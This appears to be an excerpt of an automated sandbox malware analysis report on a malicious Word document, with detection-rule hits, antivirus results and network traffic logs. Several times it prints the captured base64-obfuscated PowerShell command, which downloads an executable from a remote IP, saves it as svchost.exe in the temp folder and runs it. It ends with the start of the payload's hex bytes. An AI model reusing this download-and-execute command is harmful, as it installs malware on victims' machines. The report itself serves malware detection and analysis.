        Source: Process startedAuthor: frack113: Data: Command: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1408, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1432, ProcessName: powershell.exe
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3084, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 3188, ProcessName: svchost.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1408, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1432, ProcessName: powershell.exe
        Sigma detected: Office Macro File Creation
        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1096, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
        Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1432, TargetFilename: C:\Users\user\AppData\Local\Temp\t52pnbyr.1tt.ps1

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeAvira: detection malicious, Label: TR/Crypt.Agent.mvien
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeReversingLabs: Detection: 91%
        Multi AV Scanner detection for submitted file
        Source: 472.rtf.docReversingLabs: Detection: 26%
        Machine Learning detection for sample
        Source: 472.rtf.docJoe Sandbox ML: detected
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

        Software Vulnerabilities

        barindex
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 May 2024 18:15:11 GMTServer: Apache/2.4.38 (Debian)Last-Modified: Tue, 21 May 2024 06:39:08 GMTETag: "2d000-618f1132a7b00"Accept-Ranges: bytesContent-Length: 184320Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 af 24 42 6c eb 45 2c 3f eb 45 2c 3f eb 45 2c 3f 56 0a ba 3f ea 45 2c 3f f5 17 a8 3f f4 45 2c 3f f5 17 b9 3f fb 45 2c 3f f5 17 af 3f 89 45 2c 3f cc 83 57 3f 